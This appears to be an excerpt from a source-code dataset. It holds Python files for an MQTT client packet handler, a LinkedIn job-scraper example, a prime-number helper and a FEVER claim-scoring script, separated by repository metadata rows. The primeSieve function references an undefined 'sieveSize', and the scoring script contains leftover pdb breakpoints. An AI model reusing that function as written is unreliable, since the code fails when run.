def on_subscribe(self, cb):
if not callable(cb):
raise ValueError
self._on_subscribe_callback = cb
@property
def on_connect(self):
return self._on_connected_callback
@on_connect.setter
def on_connect(self, cb):
if not callable(cb):
raise ValueError
self._on_connected_callback = cb
@property
def on_message(self):
return self._on_message_callback
@on_message.setter
def on_message(self, cb):
if not callable(cb):
raise ValueError
self._on_message_callback = cb
@property
def on_disconnect(self):
return self._on_disconnected_callback
@on_disconnect.setter
def on_disconnect(self, cb):
if not callable(cb):
raise ValueError
self._on_disconnected_callback = cb
@property
def on_unsubscribe(self):
return self._on_unsubscribe_callback
@on_unsubscribe.setter
def on_unsubscribe(self, cb):
if not callable(cb):
raise ValueError
self._on_unsubscribe_callback = cb
class MqttPackageHandler(EventCallback):
def __init__(self, *args, **kwargs):
super(MqttPackageHandler, self).__init__(*args, **kwargs)
self._messages_in = {}
self._handler_cache = {}
self._error = None
self._connection = None
self._id_generator = IdGenerator(max=kwargs.get('receive_maximum', 65535))
if self.protocol_version == MQTTv50:
self._optimistic_acknowledgement = kwargs.get('optimistic_acknowledgement', True)
else:
self._optimistic_acknowledgement = True
def _send_command_with_mid(self, cmd, mid, dup, reason_code=0):
raise NotImplementedError
def _remove_message_from_query(self, mid):
raise NotImplementedError
def _send_puback(self, mid, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBACK, mid, False, reason_code=reason_code)
def _send_pubrec(self, mid, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBREC, mid, False, reason_code=reason_code)
def _send_pubrel(self, mid, dup, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBREL | 2, mid, dup, reason_code=reason_code)
def __get_handler__(self, cmd):
cmd_type = cmd & 0xF0
if cmd_type not in self._handler_cache:
handler_name = '_handle_{}_packet'.format(MQTTCommands(cmd_type).name.lower())
self._handler_cache[cmd_type] = getattr(self, handler_name, self._default_handler)
return self._handler_cache[cmd_type]
def _handle_packet(self, cmd, packet):
logger.debug('[CMD %s] %s', hex(cmd), packet)
handler = self.__get_handler__(cmd)
handler(cmd, packet)
self._last_msg_in = time.monotonic()
def _handle_exception_in_future(self, future):
if not future.exception():
return
self.on_disconnect(self, packet=None, exc=future.exception())
def _default_handler(self, cmd, packet):
logger.warning('[UNKNOWN CMD] %s %s', hex(cmd), packet)
def _handle_disconnect_packet(self, cmd, packet):
if self._reconnect:
future = asyncio.ensure_future(self.reconnect(delay=True))
future.add_done_callback(self._handle_exception_in_future)
self.on_disconnect(self, packet)
def _parse_properties(self, packet):
if self.protocol_version < MQTTv50:
return {}, packet
properties_len, left_packet = unpack_variable_byte_integer(packet)
packet = left_packet[:properties_len]
left_packet = left_packet[properties_len:]
properties_dict = defaultdict(list)
while packet:
property_identifier, = struct.unpack("!B", packet[:1])
property_obj = Property.factory(id_=property_identifier)
if property_obj is None:
logger.critical('[PROPERTIES] received invalid property id {}, disconnecting'.format(property_identifier))
return None, None
result, packet = property_obj.loads(packet[1:])
for k, v in result.items():
properties_dict[k].append(v)
properties_dict = dict(properties_dict)
return properties_dict, left_packet
def _handle_connack_packet(self, cmd, packet):
self._connected.set()
(flags, result) = struct.unpack("!BB", packet[:2])
if result != 0:
logger.warning('[CONNACK] %s', hex(result))
self.failed_connections += 1
if result == 1 and self.protocol_version == MQTTv50:
logger.info('[CONNACK] Downgrading to MQTT 3.1 protocol version')
MQTTProtocol.proto_ver = MQTTv311
future = asyncio.ensure_future(self.reconnect(delay=True))
future.add_done_callback(self._handle_exception_in_future)
return
else:
self._error = MQTTConnectError(result)
if self._reconnect:
asyncio.ensure_future(self.reconnect(delay=True))
return
else:
self.failed_connections = 0
if len(packet) > 2:
properties, _ = self._parse_properties(packet[2:])
if properties is None:
self._error = MQTTConnectError(10)
asyncio.ensure_future(self.disconnect())
self._connack_properties = properties
logger.debug('[CONNACK] flags: %s, result: %s', hex(flags), hex(result))
self.on_connect(self, flags, result, self.properties)
def _handle_publish_packet(self, cmd, raw_packet):
header = cmd
dup = (header & 0x08) >> 3
qos = (header & 0x06) >> 1
retain = header & 0x01
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
(slen, packet) = struct.unpack(pack_format, raw_packet)
pack_format = '!' + str(slen) + 's' + str(len(packet) - slen) + 's'
(topic, packet) = struct.unpack(pack_format, packet)
if not topic:
logger.warning('[MQTT ERR PROTO] topic name is empty')
return
try:
print_topic = topic.decode('utf-8')
except UnicodeDecodeError as exc:
logger.warning('[INVALID CHARACTER IN TOPIC] %s', topic, exc_info=exc)
print_topic = topic
payload = packet
logger.debug('[RECV %s with QoS: %s] %s', print_topic, qos, payload)
if qos > 0:
pack_format = "!H" + str(len(packet) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, packet)
else:
mid = None
properties, packet = self._parse_properties(packet)
properties['dup'] = dup
properties['retain'] = retain
if packet is None:
logger.critical('[INVALID MESSAGE] skipping: {}'.format(raw_packet))
return
if qos == 0:
run_coroutine_or_function(self.on_message, self, print_topic, packet, qos, properties)
elif qos == 1:
self._handle_qos_1_publish_packet(mid, packet, print_topic, properties)
elif qos == 2:
self._handle_qos_2_publish_packet(mid, packet, print_topic, properties)
self._id_generator.free_id(mid)
def _handle_qos_2_publish_packet(self, mid, packet, print_topic, properties):
if self._optimistic_acknowledgement:
self._send_pubrec(mid)
run_coroutine_or_function(self.on_message, self, print_topic, packet, 2, properties)
else:
run_coroutine_or_function(self.on_message, self, print_topic, packet, 2, properties,
callback=partial(self.__handle_publish_callback, qos=2, mid=mid))
def __handle_publish_callback(self, f, qos=None, mid=None):
reason_code = f.result()
if reason_code not in (c.value for c in PubRecReasonCode):
raise ValueError('Invalid PUBREC reason code {}'.format(reason_code))
if qos == 2:
self._send_pubrec(mid, reason_code=reason_code)
else:
self._send_puback(mid, reason_code=reason_code)
self._id_generator.free_id(mid)
def _handle_qos_1_publish_packet(self, mid, packet, print_topic, properties):
if self._optimistic_acknowledgement:
self._send_puback(mid)
run_coroutine_or_function(self.on_message, self, print_topic, packet, 1, properties)
else:
run_coroutine_or_function(self.on_message, self, print_topic, packet, 1, properties,
callback=partial(self.__handle_publish_callback, qos=1, mid=mid))
def __call__(self, cmd, packet):
try:
result = self._handle_packet(cmd, packet)
except Exception as exc:
logger.error('[ERROR HANDLE PKG]', exc_info=exc)
result = None
return result
def _handle_suback_packet(self, cmd, raw_packet):
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, raw_packet)
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
logger.info('[SUBACK] %s %s', mid, granted_qos)
self.on_subscribe(self, mid, granted_qos)
self._id_generator.free_id(mid)
def _handle_unsuback_packet(self, cmd, raw_packet):
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, raw_packet)
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
logger.info('[UNSUBACK] %s %s', mid, granted_qos)
self.on_unsubscribe(self, mid, granted_qos)
self._id_generator.free_id(mid)
def _handle_pingreq_packet(self, cmd, packet):
logger.debug('[PING REQUEST] %s %s', hex(cmd), packet)
pass
def _handle_pingresp_packet(self, cmd, packet):
logger.debug('[PONG REQUEST] %s %s', hex(cmd), packet)
def _handle_puback_packet(self, cmd, packet):
(mid, ) = struct.unpack("!H", packet[:2])
logger.info('[RECEIVED PUBACK FOR] %s', mid)
self._id_generator.free_id(mid)
self._remove_message_from_query(mid)
def _handle_pubcomp_packet(self, cmd, packet):
pass
def _handle_pubrec_packet(self, cmd, packet):
pass
def _handle_pubrel_packet(self, cmd, packet):
mid, = struct.unpack("!H", packet)
self._id_generator.free_id(mid)
if mid not in self._messages_in:
return
topic, payload, qos = self._messages_in[mid]
| true | true |
1c4a78d8ce31fc6b52765819f449138247bee001 | 1,552 | py | Python | examples/example1.py | lilydia/py-linkedin-jobs-scraper | a015739a7a25e8dd035f06ba629c6a48f376db43 | [
"MIT"
] | null | null | null | examples/example1.py | lilydia/py-linkedin-jobs-scraper | a015739a7a25e8dd035f06ba629c6a48f376db43 | [
"MIT"
] | null | null | null | examples/example1.py | lilydia/py-linkedin-jobs-scraper | a015739a7a25e8dd035f06ba629c6a48f376db43 | [
"MIT"
] | 1 | 2021-11-16T21:59:10.000Z | 2021-11-16T21:59:10.000Z | from linkedin_jobs_scraper import LinkedinScraper
from linkedin_jobs_scraper.events import Events, EventData
from linkedin_jobs_scraper.query import Query, QueryOptions, QueryFilters
from linkedin_jobs_scraper.filters import RelevanceFilters, TimeFilters, TypeFilters, ExperienceLevelFilters
def on_data(data: EventData):
print('[ON_DATA]', data.job_function)
def on_error(error):
print('[ON_ERROR]', error)
def on_end():
print('[ON_END]')
scraper = LinkedinScraper(
chrome_options=None, # You can pass your custom Chrome options here
max_workers=1, # How many threads will be spawn to run queries concurrently (one Chrome driver for each thread)
slow_mo=0.4, # Slow down the scraper to avoid 'Too many requests (429)' errors
)
# Add event listeners
scraper.on(Events.DATA, on_data)
scraper.on(Events.ERROR, on_error)
scraper.on(Events.END, on_end)
queries = [
Query(
options=QueryOptions(
optimize=True, # Blocks requests for resources like images and stylesheet
limit=0 # Limit the number of jobs to scrape
)
),
Query(
query='Engineer',
options=QueryOptions(
locations=['Toronto, Ontario, Canada'],
optimize=False,
limit=5,
filters=QueryFilters(
relevance=RelevanceFilters.RECENT,
time=TimeFilters.MONTH,
type=[TypeFilters.FULL_TIME, TypeFilters.INTERNSHIP],
experience=None,
)
)
),
]
scraper.run(queries)
| 28.740741 | 116 | 0.671392 | from linkedin_jobs_scraper import LinkedinScraper
from linkedin_jobs_scraper.events import Events, EventData
from linkedin_jobs_scraper.query import Query, QueryOptions, QueryFilters
from linkedin_jobs_scraper.filters import RelevanceFilters, TimeFilters, TypeFilters, ExperienceLevelFilters
def on_data(data: EventData):
print('[ON_DATA]', data.job_function)
def on_error(error):
print('[ON_ERROR]', error)
def on_end():
print('[ON_END]')
scraper = LinkedinScraper(
chrome_options=None, max_workers=1, slow_mo=0.4, )
scraper.on(Events.DATA, on_data)
scraper.on(Events.ERROR, on_error)
scraper.on(Events.END, on_end)
queries = [
Query(
options=QueryOptions(
optimize=True, limit=0 )
),
Query(
query='Engineer',
options=QueryOptions(
locations=['Toronto, Ontario, Canada'],
optimize=False,
limit=5,
filters=QueryFilters(
relevance=RelevanceFilters.RECENT,
time=TimeFilters.MONTH,
type=[TypeFilters.FULL_TIME, TypeFilters.INTERNSHIP],
experience=None,
)
)
),
]
scraper.run(queries)
| true | true |
1c4a78f4dcf40fc5ffc5474c684e0cddfad04df8 | 698 | py | Python | prime.py | CooperPair/end_to_end_encryption | 8eab4c76b0cb5bcba36442c08f9dbb336b476117 | [
"MIT"
] | 1 | 2019-01-26T16:20:09.000Z | 2019-01-26T16:20:09.000Z | prime.py | CooperPair/end_to_end_encryption | 8eab4c76b0cb5bcba36442c08f9dbb336b476117 | [
"MIT"
] | null | null | null | prime.py | CooperPair/end_to_end_encryption | 8eab4c76b0cb5bcba36442c08f9dbb336b476117 | [
"MIT"
] | null | null | null | import math
def isPrime(num):
# Return True if Number is prime else false
# isPrime is slower than primeSieve()
if num < 2:
return False
for i in range(2, int(math.sqrt(num))+1):
if num%i == 0:
return False
return True
def primeSieve():
sieve = [True]*sieveSize # list of Boolean True that is the length of sievesize.
sieve[0] = False # since 0 and 1 are not prime numbre
sieve[1] = False
#create the sieve
for i in range(2, int(math.sqrt(sieveSize)) + 1):
pointer = i*2
while pointer < sieveSize:
sieve[pointer] = False
pointer += i
# compile the list of primes:
primes = []
for i in range(sieveSize):
if sieve[i] == True:
primes.append(i)
return primes | 20.529412 | 81 | 0.670487 | import math
def isPrime(num):
if num < 2:
return False
for i in range(2, int(math.sqrt(num))+1):
if num%i == 0:
return False
return True
def primeSieve():
sieve = [True]*sieveSize sieve[0] = False sieve[1] = False
for i in range(2, int(math.sqrt(sieveSize)) + 1):
pointer = i*2
while pointer < sieveSize:
sieve[pointer] = False
pointer += i
primes = []
for i in range(sieveSize):
if sieve[i] == True:
primes.append(i)
return primes | true | true |
1c4a79bd34e32dc0bc69909503c6fba71fdbe9ab | 13,311 | py | Python | scripts/run_fever_scoring.py | salesforce/DialFact | d400b250147e45c106b18e52254b1060f7c1575d | [
"BSD-3-Clause"
] | 10 | 2021-11-08T00:37:57.000Z | 2022-03-28T12:19:29.000Z | scripts/run_fever_scoring.py | salesforce/DialFact | d400b250147e45c106b18e52254b1060f7c1575d | [
"BSD-3-Clause"
] | 1 | 2022-01-24T18:37:17.000Z | 2022-01-24T18:37:17.000Z | scripts/run_fever_scoring.py | salesforce/DialFact | d400b250147e45c106b18e52254b1060f7c1575d | [
"BSD-3-Clause"
] | 1 | 2022-03-22T08:56:04.000Z | 2022-03-22T08:56:04.000Z | import argparse
import sys
import jsonlines
from tqdm import tqdm
import logging
import json
import torch
import torch.nn.functional as F
import jsonlines
import random
import os
import numpy as np
from scipy.special import softmax
# os.environ["NCCL_SHM_DISABLE"] = "1"
from tqdm import tqdm
from typing import List
from sklearn.metrics import f1_score, precision_score, recall_score
from datasets import Dataset
from torch.utils.data import Dataset, DataLoader
from transformers import AutoConfig, AutoTokenizer, AutoModelForSequenceClassification, get_cosine_schedule_with_warmup
from transformers import AutoModelForSequenceClassification, TrainingArguments, Trainer, EvalPrediction, default_data_collator, set_seed
from transformers import InputExample, PreTrainedTokenizer, InputFeatures
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"
LABELS = ["SUPPORTS", "REFUTES", "NOT ENOUGH INFO"]
def get_json_lines(inp_file):
lines = []
with jsonlines.open(inp_file) as reader:
for obj in reader:
lines.append(obj)
return lines
def write_json_lines(output_file_name, list_data, output_folder):
with jsonlines.open(output_folder+ output_file_name, mode='w') as writer:
for dataline in list_data:
writer.write(dataline)
class ClassificationModel():
def __init__(self, num_labels=2, max_length=256, model_name_or_path='albert-large-v2', config_name=None, tokenizer_name=None):
NUM_LABELS = num_labels
self.max_seq_length = 256
self.model_name_or_path = model_name_or_path
self.config_name = config_name
self.tokenizer_name = tokenizer_name
self.max_length = max_length
config = AutoConfig.from_pretrained(
self.config_name if self.config_name else self.model_name_or_path,
num_labels=NUM_LABELS,
# cache_dir='.cache/',
)
add_prefix_space = False
if 'roberta' in self.model_name_or_path:
add_prefix_space = True
self.tokenizer = AutoTokenizer.from_pretrained(
self.tokenizer_name if self.tokenizer_name else self.model_name_or_path,
# cache_dir=model_args.cache_dir,
add_prefix_space=True,
# use_fast=True,
)
self.model = AutoModelForSequenceClassification.from_pretrained(
self.model_name_or_path,
from_tf=bool(".ckpt" in self.model_name_or_path),
config=config,
# cache_dir=args.cache_dir,
)
def get_string_text(self, tokens_a, tokens_b):
max_num_tokens = self.max_seq_length - 3
total_length = len(tokens_a) + len(tokens_b)
if total_length > max_num_tokens:
len_b = len(tokens_b)
a_begin = max_num_tokens - len_b
tokens_a = tokens_a[-a_begin:]
try:
assert len(tokens_a) + len(tokens_b) <= max_num_tokens
assert len(tokens_a) >= 1
except:
import pdb;
pdb.set_trace()
print('some problem with preproc')
# assert len(tokens_b) >= 1
tokens = []
segment_ids = []
tokens.append(self.tokenizer.cls_token)
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append(self.tokenizer.sep_token)
segment_ids.append(0)
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append(self.tokenizer.sep_token)
segment_ids.append(1)
return tokens, segment_ids
def tokenize_function_test(self, examples):
# Remove empty lines
# examples["text"] = [line for line in examples["text"] if len(line) > 0 and not line.isspace()]
# examples = [line for line in examples if len(line) > 0 and not line.isspace()]
all_texts = []
all_segment_ids = []
all_labels = []
# import pdb;pdb.set_trace()
processed = []
items = []
# keys = list(examples.keys())
# for i in range(len(examples[keys[0]])):
# ex = {}
# for k in keys:
# ex[k] = examples[k][i]
# items.append(ex)
# import pdb;pdb.set_trace()
items = examples
max_seq_length = 216
for example in items:
first_tokens = self.tokenizer.tokenize(example['actual'])
for sent2 in example['prediction']:
sec_tokens = self.tokenizer.tokenize(sent2)
tokens = ["[CLS]"] + first_tokens + ["[SEP]"] + sec_tokens
if len(sec_tokens) + len(first_tokens) > max_seq_length - 1:
tokens = tokens[:(max_seq_length - 1)]
tokens = tokens + ["[SEP]"]
segment_ids = [0] * (len(first_tokens) + 2)
segment_ids += [1] * (len(sec_tokens) + 1)
all_texts.append(tokens)
all_segment_ids.append(segment_ids)
tokenized = self.tokenizer.batch_encode_plus(
all_texts,
padding='max_length',
truncation=True,
max_length=max_seq_length,
is_split_into_words=True,
return_special_tokens_mask=True,
add_special_tokens=False,
)
# print(len(tokenized['input_ids']))
padded_length = len(tokenized['input_ids'][0])
all_segment_ids = [x + [0] * (padded_length - len(x)) for x in all_segment_ids]
tokenized['token_type_ids'] = all_segment_ids
# tokenized['label'] = all_labels
return tokenized
def tokenize_function(self, examples, sent2_type='evidence_touse', sent1_type='prediction'):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
max_seq_length = 216
for example in examples:
evidence_data = example[sent2_type]
sent2 = evidence_data
for p, sent1 in enumerate(example[sent1_type]):
if type(evidence_data) is list:
sent2 = example[sent2_type][p]
items.append([sent2, sent1])
# import pdb;pdb.set_trace()
try:
batch_encoding = self.tokenizer(
[(example[0], example[1])
for example in items],
max_length=self.max_length,
padding="max_length",
truncation=True,
)
except:
import pdb;pdb.set_trace()
# import pdb;pdb.set_trace()
features = []
input1 = list(batch_encoding.keys())[0]
num_inputs = len(batch_encoding[input1])
for i in range(num_inputs):
inputs = {k: batch_encoding[k][i] for k in batch_encoding}
feature = InputFeatures(**inputs)
features.append(feature)
return features
def tokenize_function_data(self, examples, sent2_type='evidence_touse', sent1_type='response'):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
max_seq_length = 216
for example in examples:
evidence_data = example[sent2_type]
sent2 = evidence_data
sent1 = example[sent1_type]
items.append([sent2, sent1])
# import pdb;pdb.set_trace()
try:
batch_encoding = self.tokenizer(
[(ex[0], ex[1])
for ex in items],
max_length=self.max_length,
padding="max_length",
truncation=True,
)
except:
import pdb;pdb.set_trace()
# import pdb;pdb.set_trace()
features = []
input1 = list(batch_encoding.keys())[0]
num_inputs = len(batch_encoding[input1])
for i in range(num_inputs):
inputs = {k: batch_encoding[k][i] for k in batch_encoding}
feature = InputFeatures(**inputs)
features.append(feature)
return features
def create_data_loader(tokenized_eval_dataset, batch_size):
return DataLoader(
tokenized_eval_dataset,
batch_size=batch_size,
num_workers=4,
collate_fn=default_data_collator
)
def score_testdata(args, classification_model_dnli, testdata):
tokenized_eval_dataset = classification_model_dnli.tokenize_function_data(testdata, sent1_type=args.response_tag)
# import pdb;pdb.set_trace()
# tdataset = Dataset.from_dict(tokenized_eval_dataset)
# test_data_loader = create_data_loader(tdataset, args.batch_size)
test_data_loader = create_data_loader(tokenized_eval_dataset, args.batch_size)
all_scores = []
parsed = 0
for idx, d in enumerate(tqdm(test_data_loader)):
input_ids = d["input_ids"].to(device)
attention_mask = d["attention_mask"].to(device)
token_type_ids = d["token_type_ids"].to(device)
outputs = classification_model_dnli.model(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids
)
outputs = softmax(outputs['logits'].tolist(),axis=1)
for oidx, out in enumerate(outputs):
softmax_l1 = out.tolist()
# dnli_score = [x[0] for x in softmax_l1]
# print(softmax_l1)s
# all_scores+=softmax_l1
testdata[parsed][args.typeprefix+'fever_score'] = softmax_l1
parsed+=1
def score_data(args, classification_model_dnli, max_evidences=5):
testdata = get_json_lines(args.input_file)
for i, datapoint in enumerate(tqdm(testdata)):
# lines = datapoint[args.response_tag]
if 'evidence_list' in datapoint:
all_evidences = datapoint['evidence_list'][:max_evidences]
# for e, evilist in enumerate(datapoint['evidence_list'][:max_evidences]):
# all_evidences = evilist#datapoint['evidence_list']
# print(all_evidences)
# print(['title: ' + x[0] + ' content: ' + x[2] for x in all_evidences])
all_evidence_texts = ['title: ' + x[0] + ' content: ' + x[2] for x in all_evidences]
# evidence_text = ' ### '.join(all_evidence_texts)
evidence_text = ' '.join(all_evidence_texts)
datapoint['evidence_touse'] = evidence_text
if args.claim_only:
datapoint['evidence_touse'] = ''
# import pdb;pdb.set_trace()
if len(datapoint[args.response_tag])==0:
continue
score_testdata(args, classification_model_dnli, testdata)
# scores = lm_scores(lines, model, tokenizer, device)
# datapoint['dnli_score'] = scores
write_json_lines(args.preds_file, testdata, args.output_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--cuda_device', type=int, help='id of GPU to use', default=0)
parser.add_argument('-m', '--model', type=str, help='model name to use', default='colloquial_bert_large/')
parser.add_argument('-i', '--input_file', type=str, help='path to the file containing the evaluation data', required=True)
parser.add_argument('-o', '--preds_file', type=str, help='output file to save the results')
parser.add_argument('--output_folder', type=str, help='output file to save the results', default='colloquialfeverscores/')
parser.add_argument('--response_tag', type=str, help='tag', default='response')
parser.add_argument('--batch_size', type=int, help='batch size', default=20)
parser.add_argument('--claim_only', action='store_true', default=False, help='Disables evidence')
parser.add_argument('--max_seq_length', type=int, help='batch size', default=256)
parser.add_argument('--knowledgeformat', type=str, help='tag', default='') # wikijoin
parser.add_argument('--typeprefix', type=str, help='tag', default='')
parser.add_argument('--outputprefix', type=str, help='tag', default='')
# parser.add_argument('-append', action='store_true', help='allow append to previous run', default=False)
args = parser.parse_args()
if args.preds_file is None:
args.preds_file = args.input_file.split('/')[-1]
args.preds_file = args.outputprefix + args.preds_file
# assert(not os.path.exists(args.preds_file))
if args.cuda_device>=0:
device = 'cuda:'+str(args.cuda_device)
else:
device = 'cpu'
args.device = device
classification_model_dnli = ClassificationModel(num_labels=3,model_name_or_path=args.model)
classification_model_dnli.model = classification_model_dnli.model.to(device)
print('model loaded')
classification_model_dnli.model.eval()
score_data(args, classification_model_dnli)
# python fever_scoring.py -i ../post_generation/contextagg_maskfill_mix1_wow_test_tsc_200_t1.5.jsonl --output_folder vitamincscores/ -m tals/albert-xlarge-vitaminc
# python fever_scoring.py -i ../post_generation/contextagg_maskfill_mix1_wow_test_tsc_200_t1.5.jsonl --knowledgeformat wikijoin --typeprefix colloq_ --output_folder colloquialfeverscores/ -m colloquial_bert_large
| 39.853293 | 212 | 0.631207 | import argparse
import sys
import jsonlines
from tqdm import tqdm
import logging
import json
import torch
import torch.nn.functional as F
import jsonlines
import random
import os
import numpy as np
from scipy.special import softmax
from tqdm import tqdm
from typing import List
from sklearn.metrics import f1_score, precision_score, recall_score
from datasets import Dataset
from torch.utils.data import Dataset, DataLoader
from transformers import AutoConfig, AutoTokenizer, AutoModelForSequenceClassification, get_cosine_schedule_with_warmup
from transformers import AutoModelForSequenceClassification, TrainingArguments, Trainer, EvalPrediction, default_data_collator, set_seed
from transformers import InputExample, PreTrainedTokenizer, InputFeatures
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"
LABELS = ["SUPPORTS", "REFUTES", "NOT ENOUGH INFO"]
def get_json_lines(inp_file):
lines = []
with jsonlines.open(inp_file) as reader:
for obj in reader:
lines.append(obj)
return lines
def write_json_lines(output_file_name, list_data, output_folder):
with jsonlines.open(output_folder+ output_file_name, mode='w') as writer:
for dataline in list_data:
writer.write(dataline)
class ClassificationModel():
def __init__(self, num_labels=2, max_length=256, model_name_or_path='albert-large-v2', config_name=None, tokenizer_name=None):
NUM_LABELS = num_labels
self.max_seq_length = 256
self.model_name_or_path = model_name_or_path
self.config_name = config_name
self.tokenizer_name = tokenizer_name
self.max_length = max_length
config = AutoConfig.from_pretrained(
self.config_name if self.config_name else self.model_name_or_path,
num_labels=NUM_LABELS,
)
add_prefix_space = False
if 'roberta' in self.model_name_or_path:
add_prefix_space = True
self.tokenizer = AutoTokenizer.from_pretrained(
self.tokenizer_name if self.tokenizer_name else self.model_name_or_path,
add_prefix_space=True,
)
self.model = AutoModelForSequenceClassification.from_pretrained(
self.model_name_or_path,
from_tf=bool(".ckpt" in self.model_name_or_path),
config=config,
)
def get_string_text(self, tokens_a, tokens_b):
max_num_tokens = self.max_seq_length - 3
total_length = len(tokens_a) + len(tokens_b)
if total_length > max_num_tokens:
len_b = len(tokens_b)
a_begin = max_num_tokens - len_b
tokens_a = tokens_a[-a_begin:]
try:
assert len(tokens_a) + len(tokens_b) <= max_num_tokens
assert len(tokens_a) >= 1
except:
import pdb;
pdb.set_trace()
print('some problem with preproc')
tokens = []
segment_ids = []
tokens.append(self.tokenizer.cls_token)
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append(self.tokenizer.sep_token)
segment_ids.append(0)
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append(self.tokenizer.sep_token)
segment_ids.append(1)
return tokens, segment_ids
def tokenize_function_test(self, examples):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
items = examples
max_seq_length = 216
for example in items:
first_tokens = self.tokenizer.tokenize(example['actual'])
for sent2 in example['prediction']:
sec_tokens = self.tokenizer.tokenize(sent2)
tokens = ["[CLS]"] + first_tokens + ["[SEP]"] + sec_tokens
if len(sec_tokens) + len(first_tokens) > max_seq_length - 1:
tokens = tokens[:(max_seq_length - 1)]
tokens = tokens + ["[SEP]"]
segment_ids = [0] * (len(first_tokens) + 2)
segment_ids += [1] * (len(sec_tokens) + 1)
all_texts.append(tokens)
all_segment_ids.append(segment_ids)
tokenized = self.tokenizer.batch_encode_plus(
all_texts,
padding='max_length',
truncation=True,
max_length=max_seq_length,
is_split_into_words=True,
return_special_tokens_mask=True,
add_special_tokens=False,
)
padded_length = len(tokenized['input_ids'][0])
all_segment_ids = [x + [0] * (padded_length - len(x)) for x in all_segment_ids]
tokenized['token_type_ids'] = all_segment_ids
return tokenized
def tokenize_function(self, examples, sent2_type='evidence_touse', sent1_type='prediction'):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
max_seq_length = 216
for example in examples:
evidence_data = example[sent2_type]
sent2 = evidence_data
for p, sent1 in enumerate(example[sent1_type]):
if type(evidence_data) is list:
sent2 = example[sent2_type][p]
items.append([sent2, sent1])
try:
batch_encoding = self.tokenizer(
[(example[0], example[1])
for example in items],
max_length=self.max_length,
padding="max_length",
truncation=True,
)
except:
import pdb;pdb.set_trace()
features = []
input1 = list(batch_encoding.keys())[0]
num_inputs = len(batch_encoding[input1])
for i in range(num_inputs):
inputs = {k: batch_encoding[k][i] for k in batch_encoding}
feature = InputFeatures(**inputs)
features.append(feature)
return features
def tokenize_function_data(self, examples, sent2_type='evidence_touse', sent1_type='response'):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
max_seq_length = 216
for example in examples:
evidence_data = example[sent2_type]
sent2 = evidence_data
sent1 = example[sent1_type]
items.append([sent2, sent1])
try:
batch_encoding = self.tokenizer(
[(ex[0], ex[1])
for ex in items],
max_length=self.max_length,
padding="max_length",
truncation=True,
)
except:
import pdb;pdb.set_trace()
features = []
input1 = list(batch_encoding.keys())[0]
num_inputs = len(batch_encoding[input1])
for i in range(num_inputs):
inputs = {k: batch_encoding[k][i] for k in batch_encoding}
feature = InputFeatures(**inputs)
features.append(feature)
return features
def create_data_loader(tokenized_eval_dataset, batch_size):
return DataLoader(
tokenized_eval_dataset,
batch_size=batch_size,
num_workers=4,
collate_fn=default_data_collator
)
def score_testdata(args, classification_model_dnli, testdata):
tokenized_eval_dataset = classification_model_dnli.tokenize_function_data(testdata, sent1_type=args.response_tag)
test_data_loader = create_data_loader(tokenized_eval_dataset, args.batch_size)
all_scores = []
parsed = 0
for idx, d in enumerate(tqdm(test_data_loader)):
input_ids = d["input_ids"].to(device)
attention_mask = d["attention_mask"].to(device)
token_type_ids = d["token_type_ids"].to(device)
outputs = classification_model_dnli.model(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids
)
outputs = softmax(outputs['logits'].tolist(),axis=1)
for oidx, out in enumerate(outputs):
softmax_l1 = out.tolist()
testdata[parsed][args.typeprefix+'fever_score'] = softmax_l1
parsed+=1
def score_data(args, classification_model_dnli, max_evidences=5):
testdata = get_json_lines(args.input_file)
for i, datapoint in enumerate(tqdm(testdata)):
if 'evidence_list' in datapoint:
all_evidences = datapoint['evidence_list'][:max_evidences]
all_evidence_texts = ['title: ' + x[0] + ' content: ' + x[2] for x in all_evidences]
evidence_text = ' '.join(all_evidence_texts)
datapoint['evidence_touse'] = evidence_text
if args.claim_only:
datapoint['evidence_touse'] = ''
if len(datapoint[args.response_tag])==0:
continue
score_testdata(args, classification_model_dnli, testdata)
write_json_lines(args.preds_file, testdata, args.output_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--cuda_device', type=int, help='id of GPU to use', default=0)
parser.add_argument('-m', '--model', type=str, help='model name to use', default='colloquial_bert_large/')
parser.add_argument('-i', '--input_file', type=str, help='path to the file containing the evaluation data', required=True)
parser.add_argument('-o', '--preds_file', type=str, help='output file to save the results')
parser.add_argument('--output_folder', type=str, help='output file to save the results', default='colloquialfeverscores/')
parser.add_argument('--response_tag', type=str, help='tag', default='response')
parser.add_argument('--batch_size', type=int, help='batch size', default=20)
parser.add_argument('--claim_only', action='store_true', default=False, help='Disables evidence')
parser.add_argument('--max_seq_length', type=int, help='batch size', default=256)
parser.add_argument('--knowledgeformat', type=str, help='tag', default='') parser.add_argument('--typeprefix', type=str, help='tag', default='')
parser.add_argument('--outputprefix', type=str, help='tag', default='')
args = parser.parse_args()
if args.preds_file is None:
args.preds_file = args.input_file.split('/')[-1]
args.preds_file = args.outputprefix + args.preds_file
if args.cuda_device>=0:
device = 'cuda:'+str(args.cuda_device)
else:
device = 'cpu'
args.device = device
